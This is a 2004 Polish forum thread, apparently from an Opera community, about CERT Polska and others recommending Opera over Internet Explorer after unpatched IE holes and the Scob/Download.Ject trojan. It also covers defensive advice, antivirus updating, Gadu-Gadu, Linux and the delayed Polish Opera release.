W związku z nowymi lukami w Internet Explorer 6,które już funkcjionują i nie da się ich natychmiast naprawić - CERT Polska,zaleca stosowanie jako przeglądarki Opery.
http://www.cert.pl/index2.html?action=show_news_more&nid=574
Jakoś z tego co piszą Microsoft nie spieszy się z ujawnieniem tego zdarzenia.Ale własciwie nie ma się czym chwalić.. A linka podesłałem moim znajomym "miłosnikom" IE
Dobrze, że nikt z nas nie korzysta z IE
tutaj tez o tym piszą:
http://www.hacking.pl/news.php?id=3892
Jest tylko jedno "ale".
Ponieważ program antywirusowy automatycznie uaktualnia się jedynie przy IE6 - to IE trzeba pozostawić jako domyślną przeglądarkę.
Tak????
Nie.
Mam Operę ustawioną jako domyślną i antywirusa z automatyczną aktualizacją (avast) i wszystko działa bez problemu.
Antywirusy raczej nie korzystają z IE przy aktualizacji (przynajmniej te, które znam), tylko same się łączą z serwerem. Gdyby korzystały z IE to byłby absurd - tak jakby lekarz nie jechał do chorego karetką, tylko furmanką i po pijanemu
Powiem szczerze,że nie jestem do końca z tym przekonany.
Mam McAfee VS 8 i pomoc techniczna mcafee w ten sposób mi poradziła.Diabli wiedzą czy to prawda.....
A co inni o tym sądzą??
Ehhh, nie zauwazylem zeby moj NOD32 jakos tesknil za IE...
Programy av do aktualizacji wykorzystuja czesto protokol HTTP... i tyle to ma 'wspolnego' z IE. Zgodnie z twoim tokiem rozumowania antyvirusy na Linuxa (tak, sa :>) nie moglyby sie aktualizowac, bo nie ma IE na dysku...
Z rzeczy do ktorych IE jest rzeczywiscie niezbedne (oprocz stron napisanych przez IEbmasterow... podpatrzylem to sformulowanie dzis na forum :>) to chyba tylko Windows Update jest. Ale przeciez mozna ustawic automatyczne sciaganie poprawek albo sciagac pliki recznie.
[maly EDIT...] nie wykluczam ze w jakims konkretnym programie av skutkiem chorego umyslu glownego programisty aktualizacja bylaby mozliwa tylko dla IE ustawionego jako domyslna przegladarka. Nic trudnego zrobic cos takiego od strony programistycznej. Ale wydaje mi sie to naprawde malo prawdopodobne...
Originally posted by Nomadik
[maly EDIT...] nie wykluczam ze w jakims konkretnym programie av skutkiem chorego umyslu glownego programisty aktualizacja bylaby mozliwa tylko dla IE ustawionego jako domyslna przegladarka. Nic trudnego zrobic cos takiego od strony programistycznej. Ale wydaje mi sie to naprawde malo prawdopodobne...
Spotkalem sie z czyms takim. Niestety bylo to stosunkowo dawno i nie pomne nazwy
programu. Swiadczy to oczywiscie o jego jakosci, wiec wylecial z mojego dysku
z duuza predkoscia.
Dla ludzi ktorzy troche sie tematem interesuja wyglada to na cos dziwacznego,
ale tak to juz jest, ze przy 95% hegemonii IE, dla wiekszosci ludzi nie ma
w tym nic niezwyklego.
orlik, jeżeli Twój program antywirusowy wymaga coby IE była domyślną przeglądarką to jest to zły program antywirusowy i należy czymprędzej się go pozbyć.
Nomadik, należy jednak zauważyć, że IE nie musi być domyślną przeglądarką, żeby Windows Update dzialało (a przynajmniej ja żadnych problemów nie miałem z tym, gdy jeszcze siedziałem na Win2K)
Re: Opera zalecana przez CERT Polska
orlik napisał(a)
W związku z nowymi lukami w Internet Explorer 6,które już funkcjionują i nie da się ich natychmiast naprawić - CERT Polska,zaleca stosowanie jako przeglądarki Opery.
http://www.cert.pl/index2.html?action=show_news_more&nid=574
Zobaczcie co mi się zrobiło z "Dostosuj pulpit", IE oraz Tlenem po wejściu na tę stronę
pasek.png
Program z cyklu Nieziemskie Przypadki OperetkiZobaczcie co mi się zrobiło z "Dostosuj pulpit", IE oraz Tlenem po wejściu na tę stronę
mina86:
No wiem, ze IE nie musi byc domyslna przegladarka, zeby WU uzywac. Ale faktycznie tak to nie do konca przejrzyscie sformulowalem ;-). Chodzilo mi raczej o rzeczy, do ktorych ta nieszczesna przegladarka jest niezbedna...
Originally posted by quiris
Program z cyklu Nieziemskie Przypadki Operetki
Co by nie gadać - to faktycznie.
Jednak to prawda.Podczas używania Mozilla antywir sam uaktualnił się.Nie wiem jak postąpi podczas surfingu Operą.
Proszę zobaczyć,jak zachowuje się skaning on-line przy Operze
http://uk.mcafee.com/root/genericURL.asp?genericURL=/common/en-gb/html_files/nonIE.asp
A tak przy Mozilla 1.6 [ dot.MkS_vir ]
http://skaner.mks.com.pl/skaner.html
Co do antywirusów, to sprawa jest dokładnie opisana tutaj: http://osiolki.net/faq/antywir
orlik napisał(a)
Co by nie gadać - to faktycznie.
Jednak to prawda.Podczas używania Mozilla antywir sam uaktualnił się.Nie wiem jak postąpi podczas surfingu Operą.
Czyli sugerujesz, że to wirus? Po restarcie systemu pasek naprawił się, narazie nie mam czasu skanować, mój dysk był 2 dni temu formatowany
operetka napisał(a)
Czyli sugerujesz, że to wirus? Po restarcie systemu pasek naprawił się, narazie nie mam czasu skanować, mój dysk był 2 dni temu formatowany
Moim skromnym zdaniem to nie żaden wirus tylko sprawy systemowe a dokładniej sterowniki do karty graficznej.Proponuję powtórną instalację karty albo aktualizację sterowników...
Pozdrawiam:)
jukko napisał(a)
Moim skromnym zdaniem to nie żaden wirus tylko sprawy systemowe a dokładniej sterowniki do karty graficznej.Proponuję powtórną instalację karty albo aktualizację sterowników...
Pozdrawiam:)
Masz rację. Później pozmieniało mi się wszystko na 16 kolorów, więc usunęłam kartę graficzną i po restarcie system ją zainstalował na nowo.
Pozdrawiam
Cieszę się że pomogło i że to nie wirus!!
Groźne błędy w przeglądarce Internet Explorer
Groźne błędy w przeglądarce Internet ExplorerW przeglądarce Internet Explorer wykryto kilka poważnych błędów, o których nie poinformował do tej pory producent. Co gorsza, są one już aktywnie wykorzystywane i nie ma możliwości zabezpieczenia się przed nimi.
Istniejące już exploity pokazują, że możliwe jest pobranie kodu wykonywalnego z innej witryny, a następnie zapisanie go i uruchomienie lokalnie. W praktyce oznacza to możliwość zaatakowania złośliwym kodem po kliknięciu odnośnika lub otwarciu listu elektronicznego, mimo posiadania w pełni zaktualizowanego Interneta Explorera.
Jedna z luk wykorzystywanych przez exploit znana jest od sierpnia 2003 i pozwala na dowolne operacje na plikach z poziomu HTML. Znajduje się w ona w kodzie odpowiadającym za obsługę obiektów adodb.stream i została uznana za Microsoft za mało istotną, ponieważ pozwala na nadużycia jedynie w przypadku pobrania kodu ze strefy lokalnej. Problem w tym, że pozostałe, wcześniej nie znane luki pozwalają na pobranie kodu z zewnątrz, zapisanie go i wyświetlenie już z zasobów lokalnych.
Luki w Internet Explorerze są tym niebezpieczniejsze, że przeglądarka jest także odpowiedzialna za wyświetlanie kodu HTML w niektórych programach pocztowych (w tym Outlook i Outlook Express) oraz innych zewnętrznych aplikacjach, nie tylko Microsoftu.
W tej chwili nie istnieją łaty na wspomniane luki. Częściowym zabezpieczeniem (kosztem funkcjonalności) może być zablokowanie wykonywania skryptów - w szczególności JavaScript, JScript - oraz ActiveX. Zalecamy jednak używanie jednej z alternatywnych przeglądarek, np. Opery, czy Mozilli.
· Źródło: Computerworld - Internet Explorer carved up by zero-day hole | CERT Polska
było....
http://my.opera.com/forums/showthread.php?s=&threadid=57632Łobudził się
http://my.opera.com/forums/showthread.php?s=&threadid=57632
EDIT: eee, nie da się skasować
willi: Połączyłem wątki.
tashi: Uważniej podawaj adresy WWW.
Nowe, groźne dziury w IE ... eksperci polecają Opere
Nowe, groźne dziury w IE
W przeglądarce internetowej Internet Explorer Microsoftu odkryto cztery nowe, niezwykle niebezpieczne błędy, które umożliwiają nieautoryzowanym użytkownikom skuteczne zaatakowanie komputera pracującego pod kontrolą systemu Windows. Co gorsze, system jest podatny na atak nawet jeżeli użytkownik zainstalował wszystkie udostępnione do tej pory przez Microsoft patche. W takiej sytuacji eksperci zalecają użytkownikom używanie jednej z alternatywnych przeglądarek, np. Opery, czy Mozilli.
więcej na ... pcworld.pl
Hehe... no i Microshot przegrywa
zobaczymy tera czy to dotrze do ludzi i zaczną przechodzić na alternatywne przeglądarki Tylko jst jeden mamkament, bo ludzie uywający Gadu-Gadu są nadal narażeni na błędy ze strony Explorera, bo wszysktie linki i reklamy z GG są w nim wyświetlane. A całe GG jest napisane czysto
Było.Pisałem o tym :-))))
http://my.opera.com/forums/showthread.php?s=&threadid=57632
originally posted by idarek
Tylko jst jeden mamkament, bo ludzie uywający Gadu-Gadu są nadal narażeni na błędy ze strony Explorera, bo wszysktie linki i reklamy z GG są w nim wyświetlane. A całe GG jest napisane czysto
No wlasnie! Czy naprawde nie da sie z tym nic zrobic? Moze uzytkownicy moga miec na to jakis wplyw... Z kim tu trzeba byloby gadac o zmianie wbudowanej przegladarki? GG meczy mnie tym pytaniem juz od dluzszego czasu - a nawet nie wiem, czy to nie przez nie zlapalam Sassera pare tygodni temu - bo innej mozliwosci po prostu nie widze - nie uzywam IE od jesieni. GG mam "on" non stop, niestety.
m.
Originally posted by marysia
No wlasnie! Czy naprawde nie da sie z tym nic zrobic?
Przesiąść się z GG na Jabbera
Przez gg raczej nie widzę możliwości przedostania się czegokolwiek groźnego.
A sasser nie potrzebuje żadnych programów do zainstalowania się. Wystarczy niezabezpieczony windows.
by d.i.z
A sasser nie potrzebuje żadnych programów do zainstalowania się. Wystarczy niezabezpieczony windows.
Mialam wtedy widac pecha. Windows zareagowal z updatem za pozno, tak samo antywirus.
Dzieki za sprostowanie.
Windows zaczyna byc systemem dla ludzi, ktorzy czytaja namietnie biuletyn i ponadto stawiaja kabale co i z ktorej strony moze nadejsc. Moze sie znudzic, prawda... mozna nie miec czasu ... ja mam dosc ...
by Urtiko
Przesiąść się z GG na Jabbera
No tak...
m.
Moze sie znudzic, prawda... mozna nie miec czasu ... ja mam dosc ...
I od tego jest linux... choćby Mandrake 10
A co odnośnie Jabbera... to co trzeba ściągnąć, jakiego klienta ze strony Jabber.org żeby zastąpić nim Gadu-Gadu?
Originally posted by idarek
A co odnośnie Jabbera... to co trzeba ściągnąć, jakiego klienta ze strony Jabber.org żeby zastąpić nim Gadu-Gadu?
Zajrzyj na www.jabberpl.org. Obecnie mają "małą" przebudowę, ale wszystko działa.
by idarek
od tego jest linux... choćby Mandrake 10
Mam linuxa i uzywam go, tyle ze rzadziej, bo przywyklam do ukladu Windowsa. W Windowsie trzyma mnie rowniez Photoshop, ktory jest bardzo dobrym programem. Ciezko jest sie "na calego" przesiasc - stad moje narzekania na Windows. Poza tym - troche nie lubie eskapizmu. Z drugiej strony jednak patrzc - to jest tylko produkt - i nie ma o co kruszyc kopii ani budzic sentymentow - skoro nie spelnia wymagan, szuka sie czegos lepszego. To samo dotyczy kwestii GG i przegladarki.
m.
Przecież KDE w 99% emuluje układ systemu graficznego Windows.Mam linuxa i uzywam go, tyle ze rzadziej, bo przywyklam do ukladu Windowsa.
Photoshop bardzo ładnie działa w Linuksie pod Wine. W Linux+ w numerze marcowym był artykuł na temat instalacji Photoshopa z wykorzystaniem WINE.W Windowsie trzyma mnie rowniez Photoshop, ktory jest bardzo dobrym programem.
Originally posted by quiris
Photoshop bardzo ładnie działa w Linuksie pod Wine.
A jak z wydajnością?
Hmm... Z Photoshopem to mam małą styczność, żeby nie powiedzieć żadną. Ale z ciekawości zainstalowałem trialową wersję PS 7.0 na Windows i na Linuxie pod WINE i muszę przyznać, że ładowanie aplikacji, otieranie obrazków, reagowanie na polecenia, używanie różnych narzędzi jest pod względem szybkości bardzo podobnie z nieznacznym wskazaniem na Windows. Oczywiście najlepiej jakby się wypowiedzieli użytkownicy korzystający codziennie z PS.A jak z wydajnością?
Kolejne niebezpieczne dziury w IE
Hi!No i znowu piszą o IE. Jak zwykle w negatywnym świetle.
http://info.onet.pl/935601,18,1,0,120,686,item.html
Najbardziej śmieszy mnie ta porada:
CERT radzi, aby użytkownicy IE zablokowali możliwość wykonywania skryptów (JavaScript, JScript i ActiveX)
Jakkolwiek zadowalające jest ostatnie zdanie:
Innym rozwiązaniem jest zainstalowanie konkurencyjnego oprogramowania, takiego jak np. Opera czy Mozilla.
Oby tak dalej to z pewnością więcej osób odejdzie od dziurawego IE.
Przecież KDE w 99% emuluje układ systemu graficznego Windows.
Chodzi mi o uklad folderow w KDE, ktory nie jest taki sam. Nic to - wylacznie sila przyzwyczajenia, ja wiem, nic mnie nie tlumaczy. Konsola mnie tez wciaz tremuje.
Photoshop bardzo ładnie działa w Linuksie pod Wine. W Linux+ w numerze marcowym był artykuł na temat instalacji Photoshopa z wykorzystaniem WINE.
Z Wine nie mam doswiadczenia... ale dobrze wiedziec.
Nie wiem w zasadzie dlaczego ciagle korzystam glownie z Windowsa - Linux w zasadzie oferuje podobna jakosc, a posiada potezna zalete bezpieczenstwa. Moze dlatego, ze mi Opera tu lepiej wyglada... (ale babski argument, koszmar, wybaczcie). Problem fontow Opery w Linuxie byl poruszany zreszta na forum i wyszlo z tego co pamietam, ze wielkosc literek nie byla do opanowania (mozna bylo ujednolicac - co zrobilam, ale i tak wyglada parszywie). Pisze teraz nie zajrzawszy do tamtej thread, wiec wybaczcie jesli nie mam aktualnych informacji. Dzis juz pozno, ale jutro postaram sie te thread znalezc i nadrobic zaleglosci.
m.
Nie wiem, czy to zwykły zbieg okoliczności, czy też nie, ale od czasu, gdy informacja z CERT zaczęła pojawiać się w różnych serwisach (Chipy, PC World Komputery itp.) - nagle wzrosła ilość osób odwiedzających mini stronę I to aż o 20%!
Uhm. A na ranking.pl Opera 7.x notuje w tym tygodniu 3.1%agle wzrosła ilość osób odwiedzających mini stronę I to aż o 20%!
Originally posted by andol
Nie wiem, czy to zwykły zbieg okoliczności, czy też nie, ale od czasu, gdy informacja z CERT zaczęła pojawiać się w różnych serwisach (Chipy, PC World Komputery itp.) - nagle wzrosła ilość osób odwiedzających mini stronę
Taak... Żeby jeszcze tylko tak była POLSKA WERSJA Opery 7.5x.
Czekamy już 5 tygodni od wyjścia O7.50 i nie ma. A ludzie przychodzą i odchodzą, co się będą bawić jakąś wersją angielskojęzyczną.... Mogliby się tam bardziej streszczać w OS ASA..
Originally posted by Nasty
Taak... Żeby jeszcze tylko tak była POLSKA WERSJA Opery 7.5x.
Eeee... tam. Ja siedzę właśnie na nieoficjalnej japońskiej (build 3805).
Mogliby się tam bardziej streszczać w OS ASA..
Dzisiaj, a właściwie wczoraj, miała być anglojęzyczna 7.52... Dzięki temu, że jej jednak nie opublikowali -- wersje narodowe będą jeszcze lepsze...
Dzięki temu, że jej jednak nie opublikowali -- wersje narodowe będą jeszcze lepsze...
Originally posted by andol
Eeee... tam. Ja siedzę właśnie na nieoficjalnej japońskiej (build 3805).
Na ftp jej nie widzę. Skąd masz?
Ale interfejsu nie masz japońskiego.
Zauważyłeś, żeby coś się zmieniło? Może jest jakiś mikro-fix poza security-fixem..Originally posted by andol
Dzisiaj, a właściwie wczoraj, miała być anglojęzyczna 7.52... Dzięki temu, że jej jednak nie opublikowali -- wersje narodowe będą jeszcze lepsze...
Małe pocieszenie.. Użytkownicy przychodzą i odchodzą, bo nie ma *żadnej* polskiej wersji...
(mało osób pokwapi się po plik językowy..)
No ale dobrze, że będzie wreszcie dziś czy jutro. Finally!
Originally posted by Nasty
Na ftp jej nie widzę. Skąd masz?
Ha!
Trafiła się okazja, więc mam. Ale interfejsu nie masz japońskiego.
No, masochistą to ja nie jestem.
Zauważyłeś, żeby coś się zmieniło? Może jest jakiś mikro-fix poza security-fixem.
Z mojego punktu widzenia nastąpiła wielka zmiana. Od czasów którejś z wersji preview 7.50 borykałem się z problemem zżerania przez Operę zasobów (bez przerwy zwiększał się zajmowany przez nią obszar pamięci). Działo się to tylko i wyłącznie wówczas, gdy miałem zaznaczoną opcję "Włącz klienta poczty i czatów". Przez pewien czas błędnie sądziłem, że problem spowodowany jest przez konto IMAP. Konto usunąłem -- problem pozostał. Po zainstalowaniu wersji japońskiej (czyli od jakichś 4 dni) - jak ręką odjął
Yummy!
No, to wreszcie sie skonczy ta udreka!!! Dzisiaj raz Opere z litosci musialem dobic, jak wrocilem z kolacji i zobaczylem, ze sie jeszcze zamyka... i zamyka... i zamyka...
Dzisiaj raz Opere z litosci musialem dobic, jak wrocilem z kolacji i zobaczylem, ze sie jeszcze zamyka...
Post ma datę 16 June 2004 14:10
Wcześnie jadasz kolacje
Ryszard napisał(a)
Post ma datę 16 June 2004 14:10
Wcześnie jadasz kolacje
Nie zdarza mi sie jadac kolacji przed godz. 24.00, wiec to jednak bylo dzis
. A zreszta - nawet gdyby - jak czlowiek cala noc pisze, i mu nie wychodzi, to sie moze pomylic?Andol tak cicho cos tam pod nosem o tej nowej wersji burczy, z czego wynika ze bedzie miala napawiony jeden z najpowazniejszych brakow/bledow - to cholerne zajmowanie gigantycznej pamieci w windzie, bez zwazania na ustawienia uzytkownika. To przeszkadza mi w namawianiu ludzi do Opery, bo jak pytaja o wady, to uczciwie wymieniam, a oni mi na to "Eeerh, ja to mam slaby komputer...". Zreszta mnie samego tez wkurza, chociaz pracuje na dobrym sprzecie.
Tym lepszym, ze cudzym
z czego wynika ze bedzie miala napawiony jeden z najpowazniejszych brakow/bledow - to cholerne zajmowanie gigantycznej pamieci w windzie, bez zwazania na ustawienia uzytkownika. To przeszkadza mi w namawianiu ludzi do Opery, bo jak pytaja o wady, to uczciwie wymieniam, a oni mi na to "Eeerh, ja to mam slaby komputer..."
Nie rozumiem o co chodzi? Mojego komputera "mocnym" nie nazwałbym w 2000r (gdy go kupiłem).
"GenuineIntel Intel(r) Celeron(tm) Processor
63MB RAM
57% wolnych zasobów systemowych"
Włączyłem ok.16, Operę też, oprócz Opery nieco jeszcze jest otwarte.
Nie widzę, żeby "coś" zmulało.
141pict.png
Może zamulanie nie dotyczy Win98? Mi też działa dobrze, ale ja mam 160 MB RAM (właściwie to też niedużo).
Takie pytanko jeszcze mam, czy jak Wy wysyłacie polski język do stworzenia polskiej instalki, to jest możliwość wysłania także jakiegoś innego domyślnego ustawienia toolbar'ów ??
Bo ja od wyjścia 7.50 szczerze się przyznaje, że zaprzestałem akcji nawracania, właśnie ze względu na nie...
A co z nimi nie tak?
Dwa razy przyszło mi tłumaczyć, co zrobić by
"ten głupi pasek wysuwający menu zniknał"
i jak to wszystko jakoś ładniej rozłozyć
(z tego co wiem, to chyba nie mi jednemu bardziej odpowiadał układ przycisków w 7.23)
p.s.
chodzi o "menu" wysuwane przez F4
p.s. 2
i o dwa razy za dużo - spróbujwytłuamczyć taką rzecz laikowi, używającemu komputera do przeglądania strone i pisania dokumentów
No patrz, a dla mnie to jeden z lepszych patentów jakie widziałem. Mówią oczywiście o zamykaniu paneli przez kliknięcie wąskiego paska na krawędzi ekranu. A tak swoją drogą to Opera jest tak elastyczna, że możesz ją zmusić żeby wyglądała tak jak chcesz i to w dużej części bez grzebania w plikach ini.
No tego się obawiałem, że nie zostanę do końca dobrze zrozumiany... Fakt, trochę nie do końca nakreśliłem o co mi chodzi. Główny problem jak dla mnie stanowi nie możliwość chowania panelu przez F4 (chowa się tylko ta część dodatkowa, bez panelowego menu).
Gdy chcemy używać F4 i chować cały panel musimy:
a) włączyć pasek przełączający, i od tej chwili część panelu chować przez F4, a drugą część w przypadku przeglądania szerokiej strony i tak przez pasek przełączający
b) dostosować pasek narzędzi, i ustawić tą część z menu panelowym na położenie "na górze" - czego wytłumaczenie nie jest takie proste dla raczkującego w danym temacie
I na dodatek - co już chyba łatwo zauważyć - mimo, że niektórym spodobało się położenie panelowego menu "na lewo" to nie mogą się tym nacieszyć chcąc pozostać równocześnie przy F4.
Teraz dodaj sobie do tego wszystkiego instalację Opery anglojęzycznym instalatorem, zmianę języku interfejsu, zmianę preferowanego języku dla stron www, i już wytłumaczenie tego wszystkiego może zająć koło 1/2h.
Shift+F4 - możesz sobie zmienić na F4 w ustawieniach.
Ale rozumiem, że dla laika te wszystkie zmiany to nie pryszcz. Z drugiej strony IE dostaje się takie jak jest i nic z nim zrobi. Warto na początku trochę wysilić szare komórki i dopieścić Operkę Zresztą nie tylko na początku. Trzeba o nią dbać dodawać nowe buttony, bookmarklety, zmieniać skórki, kochać... no trochę się zapędziłem
Eh, czemu Wy nie przekazujecie swojej widze do Porad na operapl.net
Kolejny wspaniały skrót, o którym się tu dowiedziałem Oczywiście zmiana dla porady nr. 6 wysłana
Szczerze mówiąc ja o nim też nie wiedziałem, ale zajrzałem do pomocy...
Originally posted by Zajec
Eh, czemu Wy nie przekazujecie swojej widze do Porad na operapl.net
No właśnie.. Czemu..!?!
Ktoś się czegoś ciekawego dowie, czy uświadomi sobie, że pewna funkcja, której używa nie jest taka super oczywista - niech pisze na http://operapl.net/porady.
Originally posted by Zajec
Kolejny wspaniały skrót, o którym się tu dowiedziałem
I zaakceptowana.
Gdybyś tylko napisał tam Shift+F4, a nie Alt+F4, to niektórzy nie zamknęli by sobie z rozpędu Opery..
Bo ja od wyjścia 7.50 szczerze się przyznaje, że zaprzestałem akcji nawracania, właśnie ze względu na nie...
Ustawienia pasków narzędzi są "pobieralne". Z wady łatwo jest zrobić zaletę:
W Operze wszystko możesz mieć "zupełnie inaczej niż jest". Instalujesz "nowemu" inny układ pasków dodając tekst uświadamiajacy:
Można użyć gotowy schemat, a jak będziesz wiedział(a) gdzie chcesz mieć konkretny przycisk/pasek to sobie zrobisz po swojemu.
Przed zakupem Opery 7.51 korzystałem z :
-Netscape 7
-Mozilla 1.6 PL
Ponieważ program pocztowy Mozilli pobrał mi email z wirusem W32.Bagle.aa@MM - zdecydowałem się przejść na Operę.
W portalu Mozilla.pl reklamuje się tą przeglądarkę jako bardzo bezpieczną.Tak nie jest,gdyż:
-zarówno podczas używania Netscape jak i Mozilla 1.6 zauważyłem zwiększony ruch na portach/firewall
-klient pocztowy Mozilli wpuszcza smiało wirusy
-Mozilla kilkakrotnie powodowała błędy sys z komunikatem WindowsXP o zamknięciu programu.
-na forum Mozilla , na zapytanie,jak mozliwa jest infekcja-powiedziano,możliwa......trzeba mieć włączony podgląd załączników.To wira user zobaczy.
Bez komentarza...jw.
Z Opery 7.51 jestem bardzo,bardzo zadowolony i myślę,że dotrwam z nią do v.20
Pozdrawiam:)
na forum Mozilla , na zapytanie,jak mozliwa jest infekcja-powiedziano,możliwa......trzeba mieć włączony podgląd załączników.To wira user zobaczy.
Tutaj odptaszkowanie w poczcie Widok - Zablokuj zewnętrzne elementy osadzone też może mieć "różne" skutki.
146pict.png
ech... teraz już niczego nie można być pewnym, jeśli się używa MSIE:
Okazało się, że znaleziono sposób, by złośliwy kod wykorzystujący te luki umieszczać nie tylko na stronach przygotowanych przez atakującego, ale również w zwykłych serwisach WWW, które możemy odwiedzać na co dzień.
Źródło: http://www.cert.pl/index2.html?action=show_news_more&nid=579
Nowy wirus a Opera
Jak myslicie czy Opera jest w stanie obronic sie przed tym? Czy to w ogole ma zwiazek z Opera?http://info.onet.pl/941769,18,item.html
Re: Nowy wirus a Opera
Ta "informacja" onetu zawiera w sobie tyle informacji, że należy się bać w ogóle łączyć z siecią.
"tajemniczy wirus" - dawno tak się nie ubawiłem.
Myślę, że chodzi o to samo co było omawiane w tym wątku.
Lockoom praw – Onet sieje panikę nie podając żadnej sensownej informacji. A że najprawdopodobniej z onetowego punktu widzenia istnieje tylko jedna słuszna przeglądarka, to nawet się nie kłopoczą podawaniem informacji, że np. na niebezpieczeństwo są narażeni tylko użytkownicy misiów. Nie wiem, czy tak jest, ale wcale bym się ne zdziwił.
Lepsza informacja na infojama.pl:
http://infojama.pl/article.php?sid=2622
Z tego co zrozumiałem, wirus atakuje przeglądarki Internet Explorer i serwery IIS.
błąd pozwalający na "zmuszenie" przeglądarki do uznania potencjalnie niebezpiecznego dokumentu html (np. strony WWW lub treści e-maila) za stronę "zaufaną" i wyświetlania jego zawartości bez żadnych zabezpieczeń
cytat z http://www.pcworld.pl/news/news.asp?m=7&id=67676
jakoś mi to pasuje do:
Aby się nim zarazić wystarczy odwiedzić stronę internetową, dotychczas uważaną za bezpieczną i godną zaufania.
Oczywiście - spece z onetu "rozumują/piszą":
internet -> komputer -> windows -> internet explorer -> internet (na zasadzie pierścienia), ja powiązałem te dwie wiadomości bo w obu występuje "zaufana" strona.
Liczba zarażonych stron zwiększa się w bardzo szybkim tempie. --to mnie powałiło
PS. Polecam poczytać komentarze do rzeczonego nwsa, są dość śmieszne
LOL "bezpieczny IE
Z najnowszego BBC cos na dobry sen albo dobry ranek http://news.bbc.co.uk/2/hi/technology/3840101.stm
Przed chwilą był news w Faktach TVN, że "tajemniczy wirus" szaleje w sieci ale bać się mogą tylko użytkownicy produktu microsyftu Wszem i wobec ogłoszono, że inne przeglądarki są bezpieczne. Całość okrasili zatroskaną buźką Wielkiego Billa
Wczoraj pojawiła się informacja o robaku Scob. Prezentuję kilka praktycznych informacji o tym trojanie:
-------------------------------
Informacje o robaku
-------------------------------
Scob (nazywany również "Download.Ject", "JS.Scob.Trojan", lub
"JS.Toofeer") jest prostym trojanem wykorzystującym przeglądarkę
Internet Explorer w systemie Microsoft Windows. Atakuje on serwery:
robak do każdej strony www którą pobieramy z zainfekowanego serwera
dodaje kod w języku JavaScript. Nieświadomie odwiedzając taką stronę
(uważaną dotychczas za bezpieczną) nasz komputer może zostać
zainfekowany, dając w ten sposób hakerom dostęp do danych znajdujących
się na dysku twardym.
-------------------------------
Co zrobić aby zabezpieczyć komputer
-------------------------------
1. Zainstalujcie najnowsze aktualizacje.
Najnowsze aktualizacje można automatycznie pobrać ze strony Windows
Update (http://windowsupdate.microsoft.com/)
2. Sprawdź czy twój komputer nie jest zainfekowany
Można to zrobić ręcznie, sprawdzając czy na dysku nie ma plików:
- Kk32.dll
- Surf.dat
lub skorzystać z programu antywirusowego:
Warto sprawdzić czy antywirus posiada już definicję robaka. Jeśli program posiada opcję automatycznego uaktualniania swojej bazy przez Internet, nie będzie z tym problemu.
Np dla popularnych antywirusów firmy Symantec uaktualnioną bazę wirusów można pobrać ze strony producenta.
Można również skorzystać z darmowego antywirusa dostępnego na stronie
http://www3.ca.com/securityadvisor/virusinfo/scan.aspx.
-------------------------------
Przydatne linki
-------------------------------
- Skaner eTrust Antivirus: http://www3.ca.com/securityadvisor/virusinfo/
scan.aspx
- Co powinieneś wiedzieć o Download.Ject (strona angielska):
www.microsoft.com/security/incident/download_ject.mspx
- Polska strona Microsoft Security: www.microsoft.com/poland/security/
- "3 kroki do zabezpieczenia komputera": www.microsoft.com/poland/
security/protect/
Pozdrawiam i good luck
Panda zaleca Opere
Jedynym zabezpieczeniem dla użytkowników systemu Windows jest natychmiastowa aktualizacja oprogramowania antywirusowego i zalecamy też tymczasowe korzystanie z alternatywnej przeglądarki, np. Opery lub Mozilli.link pochodzi z http://www.pspolska.pl/
No właśnie. Zalecają tymczasowe używanie alternatywnych przeglądarek.
BTW, nieźle tam mówią po polskiemu
Do łez doprowadziło mnie O znacza to.
Albo: Niebezpieczny kod [...] wykryto [...] na kilku uznanych i zaufanych serwisów
W przypadku Opery "tymczasowe" nie istenieje. Jak raz spróbujesz - zostaniesz nałogowcem
Ten cały szum spowodował najwyraźniej spore zainteresowanie Operą. Ilość odwiedzin mini strony drastycznie wzrosła. Wzrosła również ilość wejść ze stron wyszukiwarek internetowych (hasła: opera, opera przeglądarka, opera polska wersja, itp.)
Originally posted by quiris
ech... teraz już niczego nie można być pewnym, jeśli się używa MSIE:
Źródło: http://www.cert.pl/index2.html?action=show_news_more&nid=579
No nieźle.. Poziom niebezpieczeństwa IE przekracza kolejne granice absurdu, o których nawet nam się nie śniło. M$ jest bardziej kreatywny w tym zakresie, niż sięgamy wyobraźnią..
Może by tak zaktualizować Powiedz NIE - dopisując, że te luki są wykorzystywane nawet przy odwiedzaniu niektórych znanych, pozornie bezpiecznych serwisów (nawet wbrew wiedzy ich prowadzących - i link do tego artykułu).
Czy to:
http://www.drweb32.pl/index.php?id=234¶m=more
dotyczy tego samego tematu? Moim zdaniem tak.
O tym trąbią praktycznie wszędzie:No nieźle.. Poziom niebezpieczeństwa IE przekracza kolejne granice absurdu, o których nawet nam się nie śniło.
http://www.pspolska.pl/
http://infojama.pl/article.php?sid=2622
http://gospodarka.gazeta.pl/gospodarka/1,34912,2151271.html
Wykorzystajcie wszyscy OKAZJE i promujcie Opere wsrod znajomych.
Widmo zniszczenia danych przez smiertelnego wirusa ( hehe ) jest calkiem niezlym bodźcem
Originally posted by quiris
O tym trąbią praktycznie wszędzie:
I na trąbieniu się skończy. Bo jak nie było polskiej wersji Opery 7.5x, tak nie ma. I nie będzie... Zaczynam wątpić, że kiedyś ujrzę ją na oczy. Opera Software jest niepoważna... Na boże narodzenie nas nie rajcuje.....
Ja mam dość, nikomu nie będę polecał Opery, dopóki nie będzie polskiej wersji językowej. Totalny bojkot. Oni nas mają w nosie, to ja ich też.
Originally posted by Mayor
opera +pliki językowe = opera PL więc w czym problem?
W tym problem, że www.opera.com -> Opera 7.51 English version.
Mało kto będzie się bawił w doinstalowywanie polskiego pakietu językowego. Mało kto o nim wie i mało kto umie.
nie zgodzę się, z reguły jest tak że po opere sięgają już doświadczeni przez wybryki IE użytkownicy, którzy potrafią coś więcej niż tylko właczyć komputer i nacisnąć tą niebieską ikonkę "e" żeby mieć dostęp do netu
każdy średnio rozwinięty user potrafi sobie wpisać "opera pl" w googlach, a pierwszym linkiem jest własnie strona andola która już prowadzi za rączke na ten temat
a jak ktoś nie potrafi to zanaczy że ma 10 latek i nic mu sie nie stanie jak pare razy zrobi format dzieki dziurom IE i straci te pare gb mp3-jek...
Mało kto będzie się bawił w doinstalowywanie polskiego pakietu językowego. Mało kto o nim wie i mało kto umie.
Opera ma to do siebie, że tak na prawdę może ją docenić ktoś o otwartym umyśle. Taki znajdzie sobie spolszczenie i zainstaluje. Ten, który nie znajdzie/nie zainstaluje i tak nie będzie używał Opery "bo mu piłkarzyki nie chodzą".
Jak wchodzić na http://www.opera.com/download z polskim Windowsem to oferuje 7.23PL - na pewno lepsza od IE
"Kochamy polskie seriale"
